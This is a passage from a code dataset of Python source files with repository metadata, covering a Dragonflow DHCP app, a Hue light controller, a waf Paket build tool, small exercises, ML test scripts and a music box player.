= set(ip for ip in lport.ips if\n ip.version == n_const.IP_VERSION_4)\n v4_old_ips = set(ip for ip in orig_lport.ips\n if ip.version == n_const.IP_VERSION_4)\n\n if v4_ips != v4_old_ips or lport.mac != orig_lport.mac:\n self._update_port_responders(lport, orig_lport)\n\n self._update_dhcp_ips_by_subnet(lport, orig_lport)\n\n def _delete_dhcp_ips_by_subnet(self, lport):\n for subnet in lport.subnets:\n del self._dhcp_ip_by_subnet[subnet.id]\n\n @df_base_app.register_event(l2.LogicalPort, model_constants.EVENT_DELETED)\n def _lport_deleted(self, lport):\n if lport.device_owner != n_const.DEVICE_OWNER_DHCP:\n self._delete_lport_rate_limiter(lport)\n return\n\n self._uninstall_dhcp_port_responders(lport)\n self._remove_dhcp_network_flow(lport.lswitch)\n self._delete_dhcp_ips_by_subnet(lport)\n\n def _install_dhcp_port_responders(self, lport):\n ips_v4 = (ip for ip in lport.ips\n if ip.version == n_const.IP_VERSION_4)\n for ip in ips_v4:\n icmp_responder.ICMPResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=lport.ip,\n table_id=const.L2_LOOKUP_TABLE,\n ).add()\n\n arp_responder.ArpResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=ip,\n interface_mac=lport.mac,\n ).add()\n\n def _uninstall_dhcp_port_responders(self, lport):\n ips_v4 = (ip for ip in lport.ips\n if ip.version == n_const.IP_VERSION_4)\n for ip in ips_v4:\n icmp_responder.ICMPResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=lport.ip,\n table_id=const.L2_LOOKUP_TABLE,\n ).remove()\n\n arp_responder.ArpResponder(\n app=self,\n network_id=lport.lswitch.unique_key,\n interface_ip=ip,\n interface_mac=lport.mac,\n ).remove()\n","repo_name":"openstack-archive/dragonflow","sub_path":"dragonflow/controller/apps/dhcp.py","file_name":"dhcp.py","file_ext":"py","file_size_in_byte":20621,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"48"} +{"seq_id":"42523316660","text":"# scantron_checker.py\nimport random\nscantron_choices = ['a', 'b', 'c', 'd', 'e'] \n\ndef make_rand_answers():\n out_answers = []\n for _ in range(0, 5):\n out_answers.append(random.choice(scantron_choices))\n return out_answers\n\nnephews_answers = make_rand_answers()\nanswer_sheet = make_rand_answers()\nprint(nephews_answers, answer_sheet)\n\ncounter = 0\nfor i in range(5):\n if answer_sheet[i] == nephews_answers[i]:\n print(\"Correct\")\n counter += 1 # counter = counter + 1\n else:\n print(\"Incorrect\")\nprint(counter)\n\nevaluations = ['flunk', 'poor', 'mediocre', 'adequate', 'good', 'great']\nprint(f\"This student did {evaluations[counter]}\")","repo_name":"PdxCodeGuild/class_mudpuppy","sub_path":"1 Python/hints/lab_14/scantron_checker_fun.py","file_name":"scantron_checker_fun.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"42777938676","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 9 22:20:49 2020\n\n@author: con\n\"\"\"\n\nimport requests\nimport time\nimport random\nimport os\nfrom pathlib import Path\nimport json\nfrom rgbxy import Converter\nfrom rgbxy import GamutA\n\nfrom custom_errors import *\n\n\nclass Bridge:\n def __init__(self):\n self.ipaddress = ''\n self.userid = ''\n\n def get_lights(self):\n \"\"\"\n Get all lights connected to bridge\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights'\n resp = requests.get(api_string)\n if resp.status_code != 200:\n raise Exception(api_string, resp.status_code) from None\n else:\n return resp.json()\n\n def set_state(self, task, light):\n \"\"\"\n Set state of light\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights/' + str(light) + '/state'\n resp = requests.put(api_string, json=task)\n # when response is blank it failed!\n try:\n json_error_details = resp.json()[0]['error']\n self.error_handler(json_error_details)\n except KeyError:\n if resp.status_code != 200:\n raise Exception(api_string, resp.status_code) from None # Improve\n\n def get_ip_address(self):\n resp = requests.get('https://discovery.meethue.com/')\n return 'http://' + resp.json()[0]['internalipaddress'] + '/'\n\n def create_user(self):\n \"\"\"\n Register new user on Bridge, returns username if successful\n \"\"\"\n api_string = self.ipaddress + 'api'\n resp = requests.post(api_string, json={'devicetype': 'philip'})\n if 'error' in resp.json()[0]:\n self.error_handler(resp.json()[0]['error'])\n else:\n return resp.json()[0]['success']['username']\n\n def get_state(self, light):\n \"\"\"\n Gets state of light\n \"\"\"\n api_string = self.ipaddress + 'api/' + self.userid + '/lights/' + str(light)\n resp = ''\n try:\n resp = requests.get(api_string)\n return resp.json()['state']\n except TypeError:\n json_error_details = resp.json()[0]\n if 'error' in resp.json()[0]:\n print(json_error_details)\n self.error_handler(json_error_details['error'])\n except requests.exceptions.MissingSchema:\n return {}\n\n def check_connection(self, ip_add, user_id):\n api_string = ip_add + 'api/' + user_id\n status = True\n try:\n resp = requests.get(api_string)\n if type(resp.json()) is list:\n if 'error' in resp.json()[0]:\n status = False\n except requests.exceptions.MissingSchema:\n status = False\n finally:\n return status\n\n def connected(self):\n return self.check_connection(self.ipaddress, self.userid)\n\n def connect(self):\n config_path = os.getenv('HOME') + '/hue/'\n try:\n with open(config_path + 'config.txt') as json_file:\n data = json.load(json_file)\n if self.check_connection(data['ip_address'], data['user_id']):\n self.ipaddress = data['ip_address']\n self.userid = data['user_id']\n except (FileNotFoundError, json.decoder.JSONDecodeError):\n if not Path.exists(Path(config_path)):\n os.mkdir(config_path)\n self.ipaddress = self.get_ip_address()\n self.userid = self.create_user()\n json_config = {\n \"ip_address\": self.ipaddress,\n \"user_id\": self.userid\n }\n self.ipaddress = self.ipaddress\n self.userid = self.userid\n with open(config_path + 'config.txt', 'w') as outfile:\n json.dump(json_config, outfile)\n\n def error_handler(self, json_error_details):\n if json_error_details['type'] == 1:\n raise UnauthorizedUserError\n elif json_error_details['type'] == 101:\n raise LinkButtonNotPressedError\n elif json_error_details['type'] == 201:\n raise DeviceIsOffError\n else:\n raise GenericHueError(json_error_details)\n\n\nclass Light:\n def __init__(self, bridge, light_id):\n self.color_converter = Converter(GamutA)\n self.speed = 0\n self.userid = bridge.userid\n self.ipaddress = bridge.ipaddress\n self.light_id = light_id\n self.bridge = bridge\n self.strobe = False\n\n def get_status(self):\n return self.bridge.get_state(self.light_id)\n\n def on(self):\n task = {'on': True}\n self.get_color()\n self.bridge.set_state(task, self.light_id)\n\n def off(self):\n task = {'on': False}\n self.bridge.set_state(task, self.light_id)\n\n def brightness(self, percent):\n task = {\"bri\": percent}\n self.bridge.set_state(task, self.light_id)\n\n def strobe_start(self, colors, speed, is_random):\n prev_color = ''\n self.strobe = True\n self.speed = speed\n while self.strobe and self.speed < 4.5:\n if is_random: # Needs to be cleaned up to match non-random\n new_colors = colors[:]\n if prev_color != '':\n new_colors.remove(prev_color)\n prev_color = random.choice(new_colors)\n self.color(prev_color)\n time.sleep(int(self.speed))\n else:\n color_index = 0\n while color_index < len(colors) and self.speed < 4.5:\n self.color(colors[color_index])\n prev_speed = self.speed\n no_itr = self.speed / 0.1\n for i in range(int(no_itr)):\n if prev_speed != self.speed:\n break\n time.sleep(0.1)\n if self.speed == prev_speed:\n color_index += 1\n elif color_index == len(colors) - 1:\n color_index = 0\n\n def strobe_stop(self):\n self.strobe = False\n\n def strobe_speed(self, speed):\n self.speed = speed\n\n def color(self, color):\n xy_color = color[1:] # Remove '#' from hex value\n xy_color = self.color_converter.hex_to_xy(xy_color)\n\n try:\n task = {\"xy\": xy_color}\n self.bridge.set_state(task, self.light_id)\n except KeyError:\n raise ValueError('Color does not exist') from None\n\n def get_color(self):\n xy_color = self.get_status()['xy']\n hex_color = self.color_converter.xy_to_hex(xy_color[0], xy_color[1])\n return hex_color\n","repo_name":"connorjrw/hue_gui","sub_path":"hue.py","file_name":"hue.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6731405986","text":"import os\nfrom waflib.Configure import conf\nfrom waflib.TaskGen import feature, before_method, after_method, taskgen_method\nfrom waflib import Utils, Logs, Task, Context, Errors, Options\n\ndef configure(conf):\n\tdotnet = []\n\tif Utils.unversioned_sys_platform() != 'win32':\n\t\tconf.find_program('mono')\n\t\tdotnet = conf.env['MONO']\n\n\tbootstrapper = os.path.abspath(os.path.join(\n\t\t'paket',\n\t\t'.paket', \n\t\t'paket.bootstrapper.exe'\n\t))\n\n\tpaket = os.path.abspath(os.path.join(\n\t\t'paket',\n\t\t'.paket', \n\t\t'paket.exe'\n\t))\n\n\tif not Options.options.nopaket:\n\t\tconf.cmd_and_log(dotnet + [bootstrapper], cwd='paket')\n\t\tconf.cmd_and_log(dotnet + [paket, 'restore'], cwd='paket')\n\n\t\t# Replace user-overridden files after paket restore\n\t\toverrides = conf.path.find_dir('paket/overrides').ant_glob('*')\n\t\tpackages = conf.path.find_dir('paket/packages').ant_glob('**/*')\n\n\t\tfor p in packages:\n\t\t\tfor o in overrides:\n\t\t\t\tif p.name == o.name:\n\t\t\t\t\tif Logs.verbose > 0:\n\t\t\t\t\t\tLogs.info('copy %s %s' % (o.abspath(), p.abspath()))\n\t\t\t\t\tp.write(o.read())\n\n\n\tconf.env.append_value('supported_features', 'paket')\n\ndef options(ctx):\n\tctx.add_option('--nopaket', action='store_true', default=False, help='Don\\'t restore paket packages')\n\nclass Package(object):\n\tdef __init__(self, bld, group, name, node):\n\t\tself.group = group\n\t\tself.name = name\n\t\tself.deps = []\n\t\tself.byfx = {}\n\n\t\tself.create_tgs(bld, node.find_dir('lib'), False)\n\t\tself.create_tgs(bld, node.find_dir('ref'), True)\n\n\tdef create_tgs(self, bld, node, is_ref):\n\t\tif node is None:\n\t\t\treturn\n\n\t\troot = node.abspath()\n\t\tfor fx in os.listdir(root):\n\t\t\tfx_path = os.path.join(root, fx)\n\t\t\tif os.path.isdir(fx_path):\n\t\t\t\tif fx in self.byfx:\n\t\t\t\t\tcontinue\n\t\t\t\tfx_node = node.make_node(fx)\n\t\t\t\tfor file in os.listdir(fx_path):\n\t\t\t\t\text = os.path.splitext(file)[1]\n\t\t\t\t\tif ext == '.dll':\n\t\t\t\t\t\tself.make_nuget_lib(bld, fx, fx_node.make_node(file), is_ref)\n\t\t\telif not is_ref:\n\t\t\t\text = os.path.splitext(fx)[1]\n\t\t\t\tif ext == '.dll':\n\t\t\t\t\tself.make_nuget_lib(bld, 'lib', node.make_node(fx), is_ref)\n\n\tdef make_nuget_lib(self, bld, fx, node, is_ref):\n\t\t# print 'make: %s, %s, %s' % (fx, node, is_ref)\n\t\t# nuget_lib will make a fake_csshlib which will\n\t\t# cause install_outputs() to be called and it will\n\t\t# put the .dll, .pdb and .config into the ${BINDIR}\n\t\ttg = bld(\n\t\t\tname='%s:%s:%s:%s' % (self.group, self.name, fx, node.name),\n\t\t\tinstall_path = '${BINDIR}',\n\t\t\tfeatures='nuget_lib',\n\t\t\tnode=node,\n\t\t\tis_ref=is_ref\n\t\t)\n\t\tlst = self.byfx.setdefault(fx, [])\n\t\tlst.append(tg)\n\n\tdef __repr__(self):\n\t\treturn '%s/%s: %s' % (self.group, self.name, self.byfx)\n\n@conf\ndef read_paket(self, lockfile):\n\tif not self.env.MCS:\n\t\treturn\n\n\tpkgs = {}\n\tgroup = ''\n\tgroups = { group : pkgs }\n\tparent = None\n\troot = self.path.find_dir('packages')\n\tnode = root\n\n\tsrc = self.path.find_resource(lockfile)\n\tif src:\n\t\tignore = False\n\t\tcontents = src.read()\n\t\tfor line in contents.splitlines():\n\t\t\tif line.startswith('GROUP'):\n\t\t\t\tgroup = line[6:]\n\t\t\t\tpkgs = {}\n\t\t\t\tgroups[group] = pkgs\n\t\t\t\tparent = None\n\t\t\t\tnode = root.find_dir(group)\n\t\t\telif line.startswith('NUGET'):\n\t\t\t\tignore = False\n\t\t\telif line.startswith('HTTP'):\n\t\t\t\tignore = True\n\t\t\telif not ignore:\n\t\t\t\tsuffix = line.lstrip(' ')\n\t\t\t\tdepth = (len(line) - len(suffix)) / 2\n\t\t\t\tif depth == 2:\n\t\t\t\t\tname = suffix.split()[0]\n\t\t\t\t\tparent = pkgs.get(name)\n\t\t\t\t\tif parent is None:\n\t\t\t\t\t\tparent = Package(self, group, name, node.find_dir(name))\n\t\t\t\t\t\tpkgs[name] = parent\n\t\t\t\telif depth == 3:\n\t\t\t\t\tpkg = suffix.split()[0]\n\t\t\t\t\tparent.deps.append(pkg)\n\n\tself.env.PAKET_PACKAGES = groups\n\n@feature('cs', 'paket')\n@before_method('install_packages')\ndef use_nuget(self):\n\tpkgs = getattr(self, 'use_packages', None)\n\tif not pkgs:\n\t\treturn\n\n\tsettings = dict(\n\t\texcludes = [],\n\t\tframeworks = [],\n\t\tgroup = ''\n\t)\n\n\tnew_settings = getattr(self, 'paket_settings')\n\tif new_settings:\n\t\tsettings.update(new_settings)\n\n\tuse = self.to_list(getattr(self, 'use', []))\n\n\ttgs = set()\n\n\tfor pkg in pkgs:\n\t\tuse_packages_recurse(self, pkg, settings, tgs)\n\n\tfor tg in sorted(tgs, key=lambda x: x.target):\n\t\t# print 'use: %s' % tg.name\n\t\tuse.append(tg.name)\n\ndef use_packages_recurse(self, pkg, settings, into):\n\tif pkg in settings['excludes']:\n\t\treturn\n\n\tgroup = self.env.PAKET_PACKAGES.get(settings['group'])\n\tif group is None:\n\t\tself.bld.fatal('%r uses unknown paket group %r' % (self.name, settings['group']))\n\n\tdep = group.get(pkg)\n\tif dep is None:\n\t\tself.bld.fatal('%r depends on unknown package %r' % (self.name, pkg))\n\n\ttgs = get_pkg_for_fx(dep, settings['frameworks'])\n\tif tgs is None:\n\t\tself.bld.fatal('%r depends on unknown framework for package %r, available frameworks: %r' % (\n\t\t\tself.name, pkg, dep.byfx.keys()\n\t\t))\n\n\tfor tg in tgs:\n\t\tif not tg.is_ref:\n\t\t\tinto.add(tg)\n\n\tfor child in dep.deps:\n\t\tuse_packages_recurse(self, child, settings, into)\n\ndef get_pkg_for_fx(dep, fxs):\n\tfor fx in fxs:\n\t\ttgs = dep.byfx.get(fx)\n\t\tif tgs:\n\t\t\treturn tgs\n\treturn None\n\n@feature('nuget_lib')\ndef process_nuget_lib(self):\n\t# self.node.sig = Utils.h_file(self.node.abspath())\n\n\tself.link_task = self.create_task('fake_csshlib', [], [self.node])\n\tself.target = self.node.name\n","repo_name":"sfncat/peach","sub_path":"pfce/pfce_src/build/tools/paket.py","file_name":"paket.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11983779005","text":"from datetime import datetime\n\n\ndef normalize_fields_from_list(response: list, new_fields: dict):\n if not type(response) == list:\n raise Exception(\n f\"Response sent is of type {type(response)}. Should be list\")\n for item in response:\n for old, new in new_fields.items():\n\n item[new] = item[old]\n del item[old]\n\n return response\n\n\ndef transform_to_week(year, week):\n return datetime.strptime(f\"{year}-{week}-1\", \"%G-%V-%u\")\n","repo_name":"Extibax/demon333-rm-lrm-v1-api","sub_path":"api/common/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21031524001","text":"try:\n bölünen = int(input(\"Bölünen sayıyı giriniz: \"))\n bölen = int(input(\"Bölen sayıyı giriniz: \"))\n sonuç = bölünen / bölen\nexcept ValueError:\n print(\"Lütfen sadece sayı giriniz.\")\nexcept ZeroDivisionError:\n print(\"Bölen sıfır olamaz.\")\nfinally:\n print(\"Sonuç:\", sonuç)\n","repo_name":"Neodevils/programming-tests","sub_path":"python/try_expect_else.py","file_name":"try_expect_else.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21025759477","text":"file = open('Hack8_Sample_Text.txt')\nfile.close()\n\ntry:\n f = open(\"Hack8_Sample_Text.txt\", encoding='utf-8')\nexcept FileNotFoundError:\n print(\"File not Found\")\n\nwith open(\"sample.txt\", 'w', encoding='utf-8') as f:\n f.write(\"my first file\\n\")\n f.write(\"This file\\n\\n\")\n f.write(\"contains three lines\\n\")\n\nwith open('sample.txt', 'r') as reader:\n # Read & print the entire file\n print(reader.read())\n\nimport sys\n\n\ndef os_interaction():\n assert ('linux' in sys.platform), \"Function can only run on Linux systems.\"\n assert ('win' in sys.platform), \"This code runs on Windows only.\"\n print('Doing something.')\n\n\ntry:\n os_interaction()\nexcept AssertionError as error:\n print(error)\n print('The os_interaction() function was not executed')\n\nprint('')\n\ntry:\n os_interaction()\nexcept AssertionError as error:\n print(error)\n print('os_interaction() function was not executed')\nelse:\n try:\n with open('sample.txt') as file:\n read_data = file.read()\n print(read_data)\n except FileNotFoundError as fnf_error:\n print(fnf_error)\nfinally:\n print('Cleaning up, irrespective of any exceptions')","repo_name":"abitale/python_belajar","sub_path":"sesi04/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1944403102","text":"def convolution(spectrum):\n n = len(spectrum)\n dic = {}\n for i in range(n):\n for j in range(n-1):\n if (j == i):\n break\n diff = int(abs(spectrum[i] - spectrum[j]))\n\n if diff == 0:\n continue\n if diff in dic.keys():\n dic[diff] += 1\n else:\n dic[diff] = 1\n\n List = []\n for k in dic:\n List.append((dic[k], k))\n List = sorted(List)\n List = List[::-1]\n \n for t in List:\n val = t[1]\n cnt = t[0]\n for j in range(cnt):\n print(val, end=\" \")\n\nif __name__ == \"__main__\":\n spectrum = [0, 137, 186, 323]\n with open('rosalind_ba4h.txt', \"r\") as file:\n spectrum = []\n f = file.read().strip().split()\n for val in f:\n spectrum.append(int(val))\n convolution(spectrum)\n","repo_name":"Jak57/bio-informatics-lab","sub_path":"BA4H.py","file_name":"BA4H.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"14642467342","text":"from abc import ABC\nfrom typing import Optional, Union\n\nfrom ..element import InteractiveElement\nfrom ...common.definitions import ElementTypes, CollisionTypes\nfrom ...configs.parser import parse_configuration\n\n\nclass AuraElement(InteractiveElement, ABC):\n \"\"\"\n Base class for entities that provide reward to an agent in its proximity.\n \"\"\"\n def __init__(self,\n reward: float,\n total_reward: Optional[float] = None,\n config_key: Optional[Union[ElementTypes, str]] = None,\n **entity_params):\n \"\"\"\n VisibleRewardZone entities provide a reward to the agent\n in close proximity with the entity.\n\n Args:\n **kwargs: other params to configure entity. Refer to Entity class\n\n Keyword Args:\n reward: Reward provided at each timestep when agent is in proximity\n total_reward: Total reward that the entity can provide during an Episode\n \"\"\"\n\n default_config = parse_configuration('element_proximity', config_key)\n entity_params = {**default_config, **entity_params}\n\n if total_reward:\n assert reward * total_reward > 0\n\n super().__init__(visible_shape=True,\n invisible_shape=True,\n reward=reward,\n **entity_params)\n\n self._limit = total_reward\n self._total_reward_provided = 0\n\n @property\n def reward(self):\n rew = super().reward\n\n if self._limit:\n reward_left = self._limit - self._total_reward_provided\n\n if abs(rew) > abs(reward_left):\n rew = reward_left\n\n self._total_reward_provided += rew\n return rew\n\n @reward.setter\n def reward(self, rew: float):\n self._reward = rew\n\n def reset(self):\n self._total_reward_provided = 0\n super().reset()\n\n @property\n def terminate_upon_activation(self):\n return False\n\n def activate(self, _):\n return None, None\n\n def _set_shape_collision(self):\n self.pm_invisible_shape.collision_type = CollisionTypes.CONTACT\n\n\nclass Fairy(AuraElement):\n \"\"\"\n Fairy entities provide a reward to an agent which is in proximity.\n\n Provides a positive reward of 2 for each timestep when an agent is in proximity.\n Default: Turquoise-blue circle of radius 8, reward 2 and total_reward 200.\n\n \"\"\"\n def __init__(self,\n reward: float,\n total_reward: Optional[float] = None,\n **entity_params):\n\n super().__init__(config_key=ElementTypes.FAIRY,\n reward=reward,\n total_reward=total_reward,\n **entity_params)\n\n\nclass Fireball(AuraElement):\n \"\"\"\n Fireball entities provide a negative reward to an agent which is in proximity.\n\n Provides a negative reward of 2 for each timestep when an agent is in proximity.\n Default: Red circle of radius 8, reward -2 and total_reward -200.\n\n \"\"\"\n def __init__(self,\n reward: float,\n total_reward: Optional[float] = None,\n **entity_params):\n super().__init__(config_key=ElementTypes.FIREBALL,\n reward=reward,\n total_reward=total_reward,\n **entity_params)\n","repo_name":"emasquil/simple-playgrounds","sub_path":"src/simple_playgrounds/element/elements/aura.py","file_name":"aura.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"22942327900","text":"import cv2 as cv\nimport numpy as np\n\ndef get_image_info(image):\n # image是numpy数据类型,numpy怎么操作,image就怎么操作\n print(type(image))\n print(image.shape)\n print(image.size)\n print(image.dtype)\n\n pixel_data = np.array(image)\n print(pixel_data)\n\n# 这个二值处理函数,对我来说就足够了\ndef global_threshold(image, image_name):\n gray = cv.cvtColor(image, cv.COLOR_RGB2GRAY) # 把输入图像灰度化\n high = gray.shape[0]\n weight = gray.shape[1]\n for cow in range(high):\n for col in range(weight):\n pv = gray[cow, col]\n if pv != 255:\n gray[cow, col] = 0\n cv.namedWindow(image_name, cv.WINDOW_NORMAL)\n cv.imshow(image_name, gray)\n\ndef process_case3():\n url = '/Users/allen/Desktop/map/'\n for i in range(10):\n img = cv.imread(url + str(i) + '.png')\n new_image = cv.resize(img,(200, 200))\n img_gray = cv.cvtColor(new_image, cv.COLOR_RGB2GRAY)\n\n h, w = img_gray.shape[:2]\n for row in range(h):\n for col in range(w):\n if img_gray[row, col] >20:\n img_gray[row, col] = 255\n else:\n img_gray[row,col] = 0\n pixel_data = np.array(img_gray) # matrix类型\n np.savetxt(url+'csv/'+str(i)+'.csv', pixel_data, delimiter = ',')\n\n\nif __name__ == '__main__':\n process_case3()\n","repo_name":"allenhsu6/python-jps","sub_path":"src/image_process.py","file_name":"image_process.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38611475680","text":"import tornado.web\nimport views.index as index\nimport config\nclass Application(tornado.web.Application):\n def __init__(self):\n handler = [\n #(r\"/\",index.IndexHandler),\n #(r\"/home\",index.HomeHandler,{\"name\":\"jack\",\"age\":100}),\n #tornado.web.url(r\"/caasdsadasdsasm\",index.CsmHandler,{\"name\":\"b\",\"age\":\"d\"},name=\"csm\"),\n #(r\"/liuyifei/(\\w+)/(\\w+)/(\\w+)\",index.LiuYiFeiHandler),\n #(r\"/liuyifei/(?P\\w+)/(?P\\w+)/(?P\\w+)\", index.LiuYiFeiHandler),\n #(r\"/zhangmanyu\",index.ZhanmanyuHandler),\n #(r\"/postfile\",index.PostfileHanlder),\n #(r\"/zhuyi\",index.ZhuyiHandler),\n #(r\"/upfile\",index.UpfileHandler),\n\n #(r\"/write\",index.WriteHandler),\n\n #(r\"/json1\",index.JsonHandler),\n #(r\"/json2\",index.Json2Handler),\n\n #(r\"/status\",index.StatusHandler),\n\n #(r\"/header\",index.HeaderHandler),\n\n #(r\"/index\",index.RedirectHander),\n\n #(r\"/error\",index.ErrorHandler),\n\n #(r\"/method\",index.MethodHandler),\n\n (r\"/jackcsm\",index.JackHandler),\n ]\n print(config.settings)\n super(Application,self).__init__(handler,**config.settings)","repo_name":"immortalChensm/python","sub_path":"tornado框架/project/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19442218201","text":"from torch.utils.data.dataset import Dataset\nimport numpy as np\nfrom dataset import DPENDataset\nfrom torch.utils.data import DataLoader\nimport os\nimport torch.optim as optim\nimport torch\nimport argparse\nimport random\nfrom estimate_params import DPEN\nimport torch.nn as nn\n\n\ndef main(**args):\n\t# set seed to ensure reproducibility\n\tseed = args['random_seed']\n\ttorch.manual_seed(seed)\n\tnp.random.seed(seed)\n\trandom.seed(seed)\n\ttorch.backends.cudnn.benchmark = False # CUDNN optimization\n\ttorch.backends.cudnn.deterministic = True\n\n\tps = args['patch_size']\n\n\t# load datasets\n\tvalset = DPENDataset(args['valset_dir'], min_sigma=args['sigma'], max_sigma=args['sigma'], min_q=args['q'], max_q=args['q'], patch_size=ps, is_test=True)\n\tval_dl = DataLoader(valset)\n\n\t# create DPEN model and set training params\n\tmodel = DPEN()\n\tmodel.load_state_dict(torch.load(args['DPEN_model']))\n\tmodel = model.cuda()\n\n\t# evaluate the model\n\tsigma = []\n\tq = []\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tfor _, data in enumerate(val_dl):\n\t\t\tdata, _, _ = data\n\t\t\tdata = data.cuda()\n\t\t\tlocal_est_sigma = []\n\t\t\tlocal_est_q = []\n\t\t\t_, _, H, W = data.shape\n\t\t\tfor h in range((H % ps) // 2, H - ps, ps):\n\t\t\t\tfor w in range((H % ps) // 2, W - ps, ps):\n\t\t\t\t\tpatch = data[:, :, h:h + ps, w:w + ps]\n\t\t\t\t\testimated_noisestd, estimated_q = model(patch)\n\t\t\t\t\tlocal_est_sigma.append(float(estimated_noisestd[0]))\n\t\t\t\t\tlocal_est_q.append(float(estimated_q[0]))\n\t\t\tsigma.append(np.mean(local_est_sigma))\n\t\t\tq.append(np.mean(local_est_q))\n\tsigma = np.array(sigma)\n\tq = np.array(q)\n\tmae_sigma = np.mean(np.abs(sigma * 255 - args['sigma']))\n\tmae_q = np.mean(np.abs(q * 100 - args['q']))\n\tprint('MAE for sigma: %f, MAE for q: %f' % (mae_sigma, mae_q))\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description=\"Test DPEN\")\n\tparser.add_argument(\"--random_seed\", type=int, default=0, help=\"Random seed to ensure reproducibility\")\n\tparser.add_argument(\"--sigma\", type=int, default=30, \\\n\t\t\t\t\t help=\"Sigma value for AWGN\")\n\tparser.add_argument(\"--patch_size\", \"--p\", type=int, default=64, help=\"Patch size\")\n\tparser.add_argument(\"--q\", type=int, default=25, \\\n\t\t\t\t\t\thelp=\"Q value for jpeg compression\")\n\tparser.add_argument(\"--valset_dir\", type=str, default=None, \\\n\t\t\t\t\t\t help='path of validation set')\n\tparser.add_argument(\"--DPEN_model\", type=str, default='./pretrained_models/DPEN_pretrained.pth', \\\n\t\t\t\t\t\thelp=\"Pretrained DPEN model to estimate distortion parameters\")\n\targspar = parser.parse_args()\n\n\tprint(\"\\n### Testing DPEN model ###\")\n\tprint(\"> Parameters:\")\n\tfor p, v in zip(argspar.__dict__.keys(), argspar.__dict__.values()):\n\t\tprint('\\t{}: {}'.format(p, v))\n\tprint('\\n')\n\tmain(**vars(argspar))\n\t\n\t\n","repo_name":"claudiom4sir/MdVRNet","sub_path":"test_dpen.py","file_name":"test_dpen.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"17312811508","text":"#!/usr/bin/python3\n\nimport tkinter\nimport tkinter.font\nimport sqlite3\nimport vlc\nimport time\nfrom pathlib import Path\n\n# set some of the main window properties\nplayerWindow = tkinter.Tk()\nplayerWindow.geometry(\"480x320\")\nplayerWindow.title(\"Music Box\")\nmyFont = tkinter.font.Font(family='Helvetica', size=12, weight=\"bold\")\nplaylistFont = tkinter.font.Font(family='Helvetica', size=10)\n\n# the root directory where music will be stored\nrootMusicPath = Path(\"/music/\")\n\n# persistent playlist variable\nplaylist = []\nplaylistPos = 0\n\n# create the VLC objects we need -- a player, a media list, a media list player, and an event manager for the media player in the media list player\nplayer = vlc.Instance()\nmediaList = player.media_list_new()\nlistPlayer = player.media_list_player_new()\nevents = listPlayer.get_media_player().event_manager()\n\ndef prevTrack():\n\tglobal playlistPos\n\t\n\tif playlistPos > 0:\n\t\tplaylistPos -= 1\n\t\tlistPlayer.previous()\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef pauseTrack():\n\tglobal playlistPos\n\t\n\tif listPlayer.is_playing():\n\t\tlistPlayer.pause()\n\t\tpauseButton.config(text=\">\")\n\t\tnpLabel.config(text=\"Now playing: Paused\")\n\telse:\n\t\tlistPlayer.play()\n\t\tpauseButton.config(text=\"||\")\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef stopTrack():\n\tif listPlayer.is_playing():\n\t\tlistPlayer.stop()\n\t\tpauseButton.config(text=\">\")\n\t\tnpLabel.config(text=\"Now playing: Stopped\")\n\ndef nextTrack():\n\tglobal playlistPos\n\t\n\tif playlistPos < (len(playlist) - 1):\n\t\tplaylistPos += 1\n\t\tlistPlayer.next()\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\ndef exitProgram():\n\tplayerWindow.quit()\n\t\ndef scanHandler(event=None):\n\tfetchAlbum(barcodeEntry.get())\n\t\ndef fetchAlbum(barcode):\n\n\tbarcodeEntry.delete(0, tkinter.END)\n\n\t# set up connection to SQLite3 database\n\tconn = sqlite3.connect(\"/home/pi/musicBox/music.db\")\n\tcurs = conn.cursor()\n\n\t# find the path to the files using the barcode\n\tquery = \"SELECT albumPath FROM albums WHERE albumID = \" + str(barcode)\n\tcurs.execute(query)\n\tresult = curs.fetchall()\n\n\t# if we find a match in the database\n\tif result:\n\t\tfor x in result:\n\t\t\t# append the path from the match in the database to the root music path\n\t\t\talbumPath = rootMusicPath / x[0]\n\t\t\t# get a list of mp3 files from the 